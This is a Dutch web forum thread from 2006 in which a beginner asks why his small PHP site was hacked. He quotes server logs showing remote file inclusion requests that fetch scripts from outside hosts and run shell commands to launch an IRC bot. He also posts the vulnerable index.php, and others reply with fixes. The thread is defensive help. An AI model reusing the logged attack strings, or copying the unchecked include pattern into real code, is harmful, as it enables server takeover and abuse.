Website gehackt! Gat in website ?

Pagina: 1
Acties:
  • 83 views sinds 30-01-2008

  • Tranzy
  • Registratie: Augustus 2001
  • Laatst online: 09-01 07:58
Excuses voor het lange quotje.
Geachte heer/mevrouw,

Wij hebben helaas moeten constateren dat via uw website hackers erin geslaagd zijn om een illegale IRC bot op te zetten. Wij hebben daarom uw website uitgezet, want het dataverkeer dat ontstond loopt in de terrabytes. U kunt nog wel emailen en met ftp uw website aanpassen, wij verzoeken u het te onderzoeken hoe het kan dat men via index.php bash commando's konden uitvoeren en verzoeken u uw webscripts te beveiligen. Zodra dat gelukt is wordt uw website uiteraard weer aangezet.


213.114.21.87 - - [31/May/2006:16:18:28 +0200] "GET /index.php?p=http://slnd.5000megs.com/tool25.jpg?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%20*;./xh%20-s%20\"bin/bash\"%20./httpd%20-b%20ccw%20p://www.google.it/ HTTP/1.0" 200 6244 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
213.114.21.87 - - [31/May/2006:16:18:32 +0200] "GET /index.php?p=http://slnd.5000megs.com/tool25.jpg?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%20*;./xh%20-s%20\"bin/bash\"%20./httpd%20-b%20ccw HTTP/1.0" 200 6244 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
213.114.21.87 - - [31/May/2006:16:18:34 +0200] "GET /css/default.css HTTP/1.0" 200 1139 "http://www.kraanbediening.nl/index.php?p=http://slnd.5000megs.com/tool25.jpg?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%20*;./xh%20-s%20\"bin/bash\"%20./httpd%20-b%20ccw" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
213.114.21.87 - - [31/May/2006:16:18:34 +0200] "GET /editor/editor.js HTTP/1.0" 200 46443 "http://www.kraanbediening.nl/index.php?p=http://slnd.5000megs.com/tool25.jpg?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%20*;./xh%20-s%20\"bin/bash\"%20./httpd%20-b%20ccw" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
213.114.21.87 - - [31/May/2006:16:18:36 +0200] "GET /Images/nl.gif HTTP/1.0" 200 1006 "http://www.kraanbediening.nl/index.php?p=http://slnd.5000megs.com/tool25.jpg?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%20*;./xh%20-s%20\"bin/bash\"%20./httpd%20-b%20ccw" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
213.114.21.87 - - [31/May/2006:16:18:36 +0200] "GET /Images/de.gif HTTP/1.0" 200 1003 "http://www.kraanbediening.nl/index.php?p=http://slnd.5000megs.com/tool25.jpg?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%20*;./xh%20-s%20\"bin/bash\"%20./httpd%20-b%20ccw" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
213.114.21.87 - - [31/May/2006:16:18:36 +0200] "GET /Images/gb.gif HTTP/1.0" 200 1006 "http://www.kraanbediening.nl/index.php?p=http://slnd.5000megs.com/tool25.jpg?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%20*;./xh%20-s%20\"bin/bash\"%20./httpd%20-b%20ccw" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
213.114.21.87 - - [31/May/2006:16:18:36 +0200] "GET /Images/fr.gif HTTP/1.0" 200 1006 "http://www.kraanbediening.nl/index.php?p=http://slnd.5000megs.com/tool25.jpg?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%20*;./xh%20-s%20\"bin/bash\"%20./httpd%20-b%20ccw" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
213.114.21.87 - - [31/May/2006:16:18:36 +0200] "GET /images/grp.gif HTTP/1.0" 404 343 "http://www.kraanbediening.nl/index.php?p=http://slnd.5000megs.com/tool25.jpg?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%20*;./xh%20-s%20\"bin/bash\"%20./httpd%20-b%20ccw" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
213.114.21.87 - - [31/May/2006:16:18:36 +0200] "GET /images/folder.gif HTTP/1.0" 404 346 "http://www.kraanbediening.nl/index.php?p=http://slnd.5000megs.com/tool25.jpg?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%20*;./xh%20-s%20\"bin/bash\"%20./httpd%20-b%20ccw" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
213.114.21.87 - - [31/May/2006:16:18:36 +0200] "GET /images/lock.gif HTTP/1.0" 404 344 "http://www.kraanbediening.nl/index.php?p=http://slnd.5000megs.com/tool25.jpg?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%20*;./xh%20-s%20\"bin/bash\"%20./httpd%20-b%20ccw" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
213.114.21.87 - - [31/May/2006:16:18:36 +0200] "GET /Images/backbody.gif HTTP/1.0" 200 47 "http://www.kraanbediening.nl/index.php?p=http://slnd.5000megs.com/tool25.jpg?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%20*;./xh%20-s%20\"bin/bash\"%20./httpd%20-b%20ccw" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
213.114.21.87 - - [31/May/2006:16:18:36 +0200] "GET /images/sign.gif HTTP/1.0" 404 344 "http://www.kraanbediening.nl/index.php?p=http://slnd.5000megs.com/tool25.jpg?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%20*;./xh%20-s%20\"bin/bash\"%20./httpd%20-b%20ccw" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
213.114.21.87 - - [31/May/2006:16:18:36 +0200] "GET /Images/redwhite.gif HTTP/1.0" 200 821 "http://www.kraanbediening.nl/index.php?p=http://slnd.5000megs.com/tool25.jpg?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%20*;./xh%20-s%20\"bin/bash\"%20./httpd%20-b%20ccw" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
213.114.21.87 - - [31/May/2006:16:18:36 +0200] "GET /Images/toplang.gif HTTP/1.0" 200 37202 "http://www.kraanbediening.nl/index.php?p=http://slnd.5000megs.com/tool25.jpg?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%20*;./xh%20-s%20\"bin/bash\"%20./httpd%20-b%20ccw" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
213.114.21.87 - - [31/May/2006:16:18:36 +0200] "GET /Images/kraanback.gif HTTP/1.0" 200 64744 "http://www.kraanbediening.nl/index.php?p=http://slnd.5000megs.com/tool25.jpg?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%20*;./xh%20-s%20\"bin/bash\"%20./httpd%20-b%20ccw" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
66.249.72.3 - - [31/May/2006:16:18:41 +0200] "GET /index.php?p=http://slnd.5000megs.com/tool25.jpg?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%20*;./xh%20-s%20%22bin/bash%22%20./httpd%20-b%20ccw HTTP/1.1" 200 6244 "-" "Mediapartners-Google/2.1"
66.249.72.3 - - [31/May/2006:16:18:42 +0200] "GET /index.php?p=http://slnd.5000megs.com/tool25.jpg?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%20*;./xh%20-s%20%22bin/bash%22%20./httpd%20-b%20ccw HTTP/1.1" 200 6244 "-" "Mediapartners-Google/2.1"
213.114.21.87 - - [31/May/2006:16:19:47 +0200] "GET /index.php?p=http://backup.altervista.org/start.png?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%20*;./xh%20-s%20\"bin/bash\"%20./httpd%20-b%20ccw HTTP/1.0" 200 15846 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
213.114.21.87 - - [31/May/2006:16:19:50 +0200] "GET /images/grp.gif HTTP/1.0" 404 343 "http://www.kraanbediening.nl/index.php?p=http://backup.altervista.org/start.png?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%20*;./xh%20-s%20\"bin/bash\"%20./httpd%20-b%20ccw" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
213.114.21.87 - - [31/May/2006:16:19:50 +0200] "GET /images/folder.gif HTTP/1.0" 404 346 "http://www.kraanbediening.nl/index.php?p=http://backup.altervista.org/start.png?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%20*;./xh%20-s%20\"bin/bash\"%20./httpd%20-b%20ccw" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
213.114.21.87 - - [31/May/2006:16:19:50 +0200] "GET /images/lock.gif HTTP/1.0" 404 344 "http://www.kraanbediening.nl/index.php?p=http://backup.altervista.org/start.png?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%20*;./xh%20-s%20\"bin/bash\"%20./httpd%20-b%20ccw" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
213.114.21.87 - - [31/May/2006:16:19:50 +0200] "GET /images/sign.gif HTTP/1.0" 404 344 "http://www.kraanbediening.nl/index.php?p=http://backup.altervista.org/start.png?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%20*;./xh%20-s%20\"bin/bash\"%20./httpd%20-b%20ccw" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
66.249.72.3 - - [31/May/2006:16:19:50 +0200] "GET /index.php?p=http://backup.altervista.org/start.png?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%20*;./xh%20-s%20%22bin/bash%22%20./httpd%20-b%20ccw HTTP/1.1" 200 15846 "-" "Mediapartners-Google/2.1"
66.249.72.3 - - [31/May/2006:16:19:51 +0200] "GET /index.php?p=http://backup.altervista.org/start.png?&cmd=cd%20/var/tmp/.debug/;mv%20iroffer%20httpd;chmod%20777%
Ik heb geen flauw idee waar ik moet kijken .... ik heb deze website naar mijn beste kunnen een jaar of twee geleden gemaakt. Ben er al weer een tijd niet meer mee bezig....en dit was mijn eerste site die ik gemaakt had. Ik heb geen verstand van PHP ....laat staan dit!

Ik heb ook een leuke computer..


  • GlowMouse
  • Registratie: November 2002
  • Niet online
In index.php staat ergens include($_GET['p']) zonder enige vorm van controle over wat $_GET['p'] mag zijn. Zolang je je niet in PHP verdiept en zulke fouten maakt, kun je beter statische pagina's gebruiken.

  • BHQ
  • Registratie: November 2003
  • Laatst online: 14-02 18:07

BHQ

Lijkt me eerder dat hun servers überleaky zijn, maargoed :)

  • thaan
  • Registratie: Oktober 2004
  • Laatst online: 11:16
Je pagina systeem is niet veilig, zou je je index.php hier even kunnen plaatsen?

  • Snake
  • Registratie: Juli 2005
  • Laatst online: 07-03-2024

Snake

Los Angeles, CA, USA

Laat eens wat code zien van je index.php?

Going for adventure, lots of sun and a convertible! | GMT-8


  • Quadro!
  • Registratie: Maart 2004
  • Laatst online: 13-02 16:14
http://www.devshed.com/c/a/PHP/PHP-Security-Mistakes/

Je include in je index.php namelijk zonder te controleren de variable "p". Dit is voor jou natuurlijk gewoon de pagina of zo, maar iemand anders kan hier dus gewoon een extern script / whatever via jou host te laten lopen.

[ Voor 64% gewijzigd door Quadro! op 06-07-2006 20:35 ]


  • MeNTaL_TO
  • Registratie: Januari 2000
  • Laatst online: 11-02 20:34

MeNTaL_TO

The future is not set

want het dataverkeer dat ontstond loopt in de terrabytes.
Hoelang heeft het geduurd voordat ze hier achter kwamen en moet je per GB bij betalen :?

Wenn ist das Nunstruck git und Slotermeyer? Ja!... Beiherhund das Oder die Flipperwaldt gersput! The Hornets of Hades have descended upon me


  • Tranzy
  • Registratie: Augustus 2001
  • Laatst online: 09-01 07:58
LET OP !! IK HEB DE CODE EVEN OPNIEUW GEPLAATST (hij is nu wat korter en overzichtelijker)

code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
<?

include "include/function.php";



if(!empty($_POST["mailit"])) {



    stuurMail($_POST["naam"] . " <" . $_POST["email"] . ">", "Een bericht van de website", $_POST["bericht"]);

}



if (empty($_GET["p"])) {

    

    $_GET["p"] = "welkom";

    

}

?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"

"http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<title>Kraanbediening.nl</title>

<link rel="shortcut icon" type="image/ico" href="Images/favicon.ico" />

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<link href="css/default.css" rel="stylesheet" type="text/css">

<script language="Javascript1.2"><!-- // load htmlarea

_editor_url = "./editor/";                     // URL to htmlarea files

var win_ie_ver = parseFloat(navigator.appVersion.split("MSIE")[1]);

if (navigator.userAgent.indexOf('Mac')        >= 0) { win_ie_ver = 0; }

if (navigator.userAgent.indexOf('Windows CE') >= 0) { win_ie_ver = 0; }

if (navigator.userAgent.indexOf('Opera')      >= 0) { win_ie_ver = 0; }

if (win_ie_ver >= 5.5) {

  document.write('<scr' + 'ipt src="' +_editor_url+ 'editor.js"');

  document.write(' language="Javascript1.2"></scr' + 'ipt>');  

} else { document.write('<scr'+'ipt>function editor_generate() { return false; }</scr'+'ipt>'); }

// --></script>

</head>

<body>

<table width="702" border="0" align="center" cellpadding="0" cellspacing="0"> 

  <tr> 

    <td class="container"><table width="700" border="0" align="center" cellpadding="0" cellspacing="0"> 

        <tr> 

          <td class="header"><div align="right">
            <table width="195" height="25" border="0" align="right" cellpadding="0" cellspacing="0">
              <tr>
                <td><div align="center"><a href="index.php">[img]"Images/nl.gif"[/img]</a></div></td>
                <td><div align="center"><a href="de/index.php">[img]"Images/de.gif"[/img]</a></div></td>
                <td><div align="center"><a href="fr/index.php">[img]"Images/fr.gif"[/img]</a></div></td>
                <td><div align="center"><a href="eng/index.php">[img]"Images/gb.gif"[/img]</a></div></td>
              </tr>
            </table>
          </div></td> 

        </tr> 

        <tr> 

          <td class="menuback"><table width="400" border="0" align="center"> 

              <tr> 

                <td class="menutop"><div align="center"><a href="?informatie">Home</a></div></td> 

                <td class="menutop"><div align="center"><a href="?p=informatie">Informatie</a></div></td> 

                <td class="menutop"><div align="center"><a href="?p=gallery">Gallerij</a></div></td> 

                <td class="menutop"><div align="center"><a href="?p=contact">Contact</a></div></td> 

              </tr> 

            </table></td> 

        </tr> 

        <tr> 

          <td class="redwhite">&nbsp;</td> 

        </tr> 

        <tr> 

          <td class="location"><div align="center"><? echo strtoupper($_GET["p"]); ?></div></td> 

        </tr> 

        <tr> 

          <td class="bodyBack"> <div align="center"> 

              <? 

        /*

        * Hier volgen de include bestanden

        * 

        */

        

        include $_GET["p"] . ".inc.php";

        ?> 

            </div></td> 

        </tr> 

        <tr> 

          <td><table width="100%"  border="0" cellspacing="0" cellpadding="0"> 

              <tr> 

                <td width="83%" nowrap class="location">Kraanbediening.nl</td> 

                <td width="17%" nowrap class="location">Copyright&copy; 2005</td> 

              </tr> 

            </table></td> 

        </tr> 

      </table></td> 

  </tr> 

</table> 

</body>

</html>

[ Voor 80% gewijzigd door Tranzy op 06-07-2006 20:43 ]

Ik heb ook een leuke computer..


  • gorgi_19
  • Registratie: Mei 2002
  • Laatst online: 10:17

gorgi_19

Kruimeltjes zijn weer op :9

Regel 279 heeft geen enkele check en zorgt er voor dat alle bestanden zo ongeveer uitgevoerd kunnen worden?

[ Voor 9% gewijzigd door gorgi_19 op 06-07-2006 20:35 ]

Digitaal onderwijsmateriaal, leermateriaal voor hbo


  • Tranzy
  • Registratie: Augustus 2001
  • Laatst online: 09-01 07:58
Sorry voor de grote code.

Maar ik heb het gemaakt voor mijn schoonvader. Verder niets meer mee gedaan.

Ik heb ook een leuke computer..


  • Snake
  • Registratie: Juli 2005
  • Laatst online: 07-03-2024

Snake

Los Angeles, CA, USA

je controleerd niet of de pagina $_GET['p'] bestaat, je kan zo iedere pagina includen

Going for adventure, lots of sun and a convertible! | GMT-8


  • Tranzy
  • Registratie: Augustus 2001
  • Laatst online: 09-01 07:58
Hmm. En ik was nog zo trots op mijzelf ... 'My first (php) website' _/-\o_
En ook nog in meerder talen !

Maar wat zou ik moeten veranderen volgens jullie ?

Ik heb ook een leuke computer..


  • gorgi_19
  • Registratie: Mei 2002
  • Laatst online: 10:17

gorgi_19

Kruimeltjes zijn weer op :9

Tranzy schreef op donderdag 06 juli 2006 @ 20:41:
Maar wat zou ik moeten veranderen volgens jullie ?
Doe eens een gok, wat denk je zelf? :)

Digitaal onderwijsmateriaal, leermateriaal voor hbo


  • GlowMouse
  • Registratie: November 2002
  • Niet online
Tranzy schreef op donderdag 06 juli 2006 @ 20:41:
Hmm. En ik was nog zo trots op mijzelf ... 'My first (php) website' _/-\o_
En ook nog in meerder talen !

Maar wat zou ik moeten veranderen volgens jullie ?
Een goed begin zou zijn om het aantal lege regels eens te reduceren. Daarna kun je kijken op de eerder gegeven pagina.

  • Tranzy
  • Registratie: Augustus 2001
  • Laatst online: 09-01 07:58
GlowMouse schreef op donderdag 06 juli 2006 @ 20:42:
[...]

Een goed begin zou zijn om het aantal lege regels eens te reduceren. Daarna kun je kijken op de eerder gegeven pagina.
Sorry het was een dreamweaver copy and paste ... nu staat er een notepad paste.

Ik heb ook een leuke computer..


  • Tranzy
  • Registratie: Augustus 2001
  • Laatst online: 09-01 07:58
Ik heb van iemand doorgekregen dat ik bij regel 140 dit moet zetten

code:
1
2
3
4
5
if (preg_match ("/[a-z]+/i", $_GET["p"])) {

include $_GET["p"] . ".inc.php";
    
}


hij roept dus de verschillende pagina's op nl.
contact.inc.php
gallery.inc.php
informatie.inc.php
sent.inc.php
welkom.inc.php

zo heb ik deze ook in andere talen.

Ik heb ook een leuke computer..


  • gorgi_19
  • Registratie: Mei 2002
  • Laatst online: 10:17

gorgi_19

Kruimeltjes zijn weer op :9

Tranzy schreef op donderdag 06 juli 2006 @ 20:49:
Ik heb van iemand doorgekregen dat ik bij regel 140 dit moet zetten

code:
1
2
3
4
5
if (preg_match ("/[a-z]+/i", $_GET["p"])) {

include $_GET["p"] . ".inc.php";
    
}


hij roept dus de verschillende pagina's op nl.
contact.inc.php
gallery.inc.php
informatie.inc.php
sent.inc.php
welkom.inc.php

zo heb ik deze ook in andere talen.
Waarom zet je deze dan niet in een array neer en controleer je expliciet of het gevraagde bestand in de array zit?

Digitaal onderwijsmateriaal, leermateriaal voor hbo


  • Nulnulnix
  • Registratie: Januari 2001
  • Laatst online: 09-09-2025

Nulnulnix

BOFH

Geachte heer/mevrouw,

Wij hebben helaas moeten constateren dat via uw website hackers erin geslaagd zijn om een illegale IRC bot op te zetten. Wij hebben daarom uw website uitgezet, want het dataverkeer dat ontstond loopt in de terrabytes.
Dit lijkt al verdacht veel op een hack. Terrabytes? Een ISP behoort al te weten det het TERAbytes is. (Terra = aarde 8)7 )
Daarnaast is het m.i. meer de taak van de provider om e.e.a. na te gaan.
Hoe wil een "leek" die een leuke pagina heeft gebouwd dat nagaan? Die heeft nog geen eens de kennis in huis! Ik ben van beroep systeembeheerder en ook ik zou het niet of nauwelijks kunnen, dus hoe een huis-tuin en keuken gebruiker dan wel???
Daarnaast laten hackers informatie achter. Met gespecialiseerde programmatuur is dat te achterhalen.
M.i. behoort dat niet tot de taak van een "gebruiker".
U kunt nog wel emailen en met ftp uw website aanpassen, wij verzoeken u het te onderzoeken hoe het kan dat men via index.php bash commando's konden uitvoeren en verzoeken u uw webscripts te beveiligen. Zodra dat gelukt is wordt uw website uiteraard weer aangezet.
Die comma hoort hier niet (geen enkele logica met de regel die volgt (wij....). Het moet dus een punt zijn!
Het enige wat ik me kan voorstellen is dat men jouw wachtwoord heeft achterhaald en een nieuwe index.php heeft geupload (of een backdoor hiervoor heeft gebruikt).
Ook het bericht vertrouw ik dus niet...

We have just one world, but we live in different ones...


  • BCC
  • Registratie: Juli 2000
  • Laatst online: 07:40

BCC

Dit
include $_GET["p"] . ".inc.php";
in combinatie met een slecht geconfigureerde webserver zorgt ervoor dat je willekeurige code kan uitvoeren op de server. In dit geval werden er bestanden in de /tmp/.debug/ gezet welke waarschijnlijk enthousiast door een boel mensen gedownload zijn.

Het simpelste is een array met legale modules op te nemen en met inArray te checken of p hierin voorkomt. Zo ja -> doe p, zo nee, p="welkom". Verder zou ik de site door iemand laten nakijken die er verstand van heeft, want als er dit soort gaten in zitten :X

Na betaling van een licentievergoeding van €1.000 verkrijgen bedrijven het recht om deze post te gebruiken voor het trainen van artificiële intelligentiesystemen.


  • mcdronkz
  • Registratie: Oktober 2003
  • Laatst online: 16-04-2025
Ik stel voor dat je even naar http://www.php.net/file_exists kijkt :)

Verwijderd

PHP:
1
include("http://jouwwebsite.nl/".$_GET['p'].".inc.php");


Dit is een makkelijke (en redelijk veilige) manier om dit tegen te gaan, wat je natuurlijk ook kunt doen is een switch statement gebruiken of de paginas die toegestaan zijn via de database aanroepen.

Maar deze bovenste code zorgt er voor dat mensen niet meer bestanden van andere websites kunnen includen.

Ook handig om file_exists te gebruiken (zie de post van mcdronkz)

Zie ook http://phpfreakz.nl/artikelen.php?aid=106&page=1 voor meer info over beveiliging

[ Voor 27% gewijzigd door Verwijderd op 06-07-2006 20:57 ]


  • Reinstein
  • Registratie: Juni 2003
  • Laatst online: 03-12-2025

Reinstein

Half-Nul

Quadropluxor schreef op donderdag 06 juli 2006 @ 20:31:
http://www.devshed.com/c/a/PHP/PHP-Security-Mistakes/

Je include in je index.php namelijk zonder te controleren de variable "p". Dit is voor jou natuurlijk gewoon de pagina of zo, maar iemand anders kan hier dus gewoon een extern script / whatever via jou host te laten lopen.
Deze meneer/mevrouw heeft ene link gepost, moet je dat article maar eens lezen, wat jij gedaan hebt wordt daar beschreven. Er staat ook een oplossing bij overigens.

Open source modeltrein besturings software


  • GlowMouse
  • Registratie: November 2002
  • Niet online
Verwijderd schreef op donderdag 06 juli 2006 @ 20:53:
PHP:
1
include("http://jouwwebsite.nl/".$_GET['p'].".inc.php");


Dit is een makkelijke (en redelijk veilige) manier om dit tegen te gaan, wat je natuurlijk ook kunt doen is een switch statement gebruiken of de paginas die toegestaan zijn via de database aanroepen.
Makkelijk misschien wel, maar dit kost je een extra Apache request per include. Erg zonde van de resources, en nog traag ook.

  • gorgi_19
  • Registratie: Mei 2002
  • Laatst online: 10:17

gorgi_19

Kruimeltjes zijn weer op :9

Nulnulnix schreef op donderdag 06 juli 2006 @ 20:52:
Dit lijkt al verdacht veel op een hack. Terrabytes? Een ISP behoort al te weten det het TERAbytes is. (Terra = aarde 8)7 )
Daarnaast is het m.i. meer de taak van de provider om e.e.a. na te gaan.
Een hoster hoort na te gaan of een site gehacked is? :? Iemand is imho zelf verantwoordelijk voor het downloaden / maken van brakke scripts.

Digitaal onderwijsmateriaal, leermateriaal voor hbo


Verwijderd

GlowMouse schreef op donderdag 06 juli 2006 @ 20:56:
[...]

Makkelijk misschien wel, maar dit kost je een extra Apache request per include. Erg zonde van de resources, en nog traag ook.
Ja klopt, maar het is ieder geval veel beter als wat hij eerst had.

Het beste is nog een switch of een database gebruiken voor je bestanden, ik betwijfel alleen of de TS snapt hoe dat werkt, daarom gaf ik hem een makkelijk voorbeeld.

  • Snake
  • Registratie: Juli 2005
  • Laatst online: 07-03-2024

Snake

Los Angeles, CA, USA

PHP:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
<?
    include "include/function.php";
    if(!empty($_POST["mailit"]))
    {
        stuurMail($_POST["naam"] . " <" . $_POST["email"] . ">", "Een bericht van de website", $_POST["bericht"]);
    }
}

?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
    <head>
        <title>Kraanbediening.nl</title>
        <link rel="shortcut icon" type="image/ico" href="Images/favicon.ico" />
        <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
        <link href="css/default.css" rel="stylesheet" type="text/css">
        <script language="Javascript1.2"><!-- // load htmlarea
            _editor_url = "./editor/";                     // URL to htmlarea files
                var win_ie_ver = parseFloat(navigator.appVersion.split("MSIE")[1]);
            if (navigator.userAgent.indexOf('Mac')        >= 0) { win_ie_ver = 0; }
            if (navigator.userAgent.indexOf('Windows CE') >= 0) { win_ie_ver = 0; }
            if (navigator.userAgent.indexOf('Opera')      >= 0) { win_ie_ver = 0; }
            if (win_ie_ver >= 5.5)
            {
                document.write('<scr' + 'ipt src="' +_editor_url+ 'editor.js"');
                document.write(' language="Javascript1.2"></scr' + 'ipt>');  
            }
            else
            {
                document.write('<scr'+'ipt>function editor_generate() { return false;} </scr'+'ipt>');
            }
            // --></script>
    </head>
    <body>
        <table width="702" border="0" align="center" cellpadding="0" cellspacing="0"> 
            <tr> 
                <td class="container">
                    <table width="700" border="0" align="center" cellpadding="0" cellspacing="0"> 
                        <tr> 
                            <td class="header">
                                <div align="right">
                                    <table width="195" height="25" border="0" align="right" cellpadding="0" cellspacing="0">
                                        <tr>
                                            <td><div align="center"><a href="index.php">[img]"Images/nl.gif"[/img]</a></div></td>
                                            <td><div align="center"><a href="de/index.php">[img]"Images/de.gif"[/img]</a></div></td>
                                            <td><div align="center"><a href="fr/index.php">[img]"Images/fr.gif"[/img]</a></div></td>
                                            <td><div align="center"><a href="eng/index.php">[img]"Images/gb.gif"[/img]</a></div></td>
                                        </tr>
                                    </table>
                                </div>
                            </td> 
                        </tr>
                        <tr> 
                            <td class="menuback">
                                <table width="400" border="0" align="center"> 
                                    <tr> 
                                        <td class="menutop"><div align="center"><a href="?informatie">Home</a></div></td> 
                                        <td class="menutop"><div align="center"><a href="?p=informatie">Informatie</a></div></td> 
                                        <td class="menutop"><div align="center"><a href="?p=gallery">Gallerij</a></div></td> 
                                        <td class="menutop"><div align="center"><a href="?p=contact">Contact</a></div></td> 
                                    </tr> 
                                </table>
                            </td> 
                        </tr>
                        <tr> 
                            <td class="redwhite">&nbsp;</td> 
                        </tr> 
                            <tr> 
                            <td class="location">
                                <div align="center">
                                    <? echo strtoupper(isset($_GET["p"])?"welkom":$_GET['p']); ?>
                                </div>
                            </td> 
                        </tr> 
                        <tr> 
                            <td class="bodyBack">
                                <div align="center"> 
<? 
switch(isset($_GET['p'])?"welkom":$_GET['p'])
{
    case "informatie";  include ("informatie.inc.php");     break;
    case "gallery";         include("gallery.inc.php");         break;
    case "contact";     include("contact.inc.php");     break;
}
?> 
                                </div>
                            </td> 
                        </tr> 
                        <tr> 
                            <td>
                                <table width="100%"  border="0" cellspacing="0" cellpadding="0"> 
                                    <tr>
                                        <td width="83%" nowrap class="location">Kraanbediening.nl</td> 
                                        <td width="17%" nowrap class="location">Copyright&copy; 2005</td> 
                                    </tr> 
                                </table>
                            </td> 
                        </tr> 
                    </table>
                </td> 
            </tr> 
        </table> 
    </body>
</html>

Going for adventure, lots of sun and a convertible! | GMT-8


  • Tranzy
  • Registratie: Augustus 2001
  • Laatst online: 09-01 07:58
Ik was even aan het lezen ... maar nogmaals ik ben nog lerende en was toendertijd lekker enthousiast met boekje en pdfjes aan het knutselen. Ben inmiddels vader geworden en heb met de drukte het wat laten liggen met het idee van ik pak het wel weer een keer op. Maar nu komt er binnenkort een tweeling aan en zie dat niet snel gebeuren :X

Ik heb ook een leuke computer..


  • gorgi_19
  • Registratie: Mei 2002
  • Laatst online: 10:17

gorgi_19

Kruimeltjes zijn weer op :9

Tranzy schreef op donderdag 06 juli 2006 @ 21:02:
Ik was even aan het lezen ... maar nogmaals ik ben nog lerende en was toendertijd lekker enthousiast met boekje en pdfjes aan het knutselen. Ben inmiddels vader geworden en heb met de drukte het wat laten liggen met het idee van ik pak het wel weer een keer op. Maar nu komt er binnenkort een tweeling aan en zie dat niet snel gebeuren :X
nofi, maar dit soort geintjes zal met veel geluk geaccepteerd worden door je hoster; zij zitten door jouw brakke scripts met een schadepost voor het dataverkeer :)

Het is dan veiliger om de boel offline te halen, of desnoods tijdelijk lokaal, dan zo :)

[ Voor 7% gewijzigd door gorgi_19 op 06-07-2006 21:05 ]

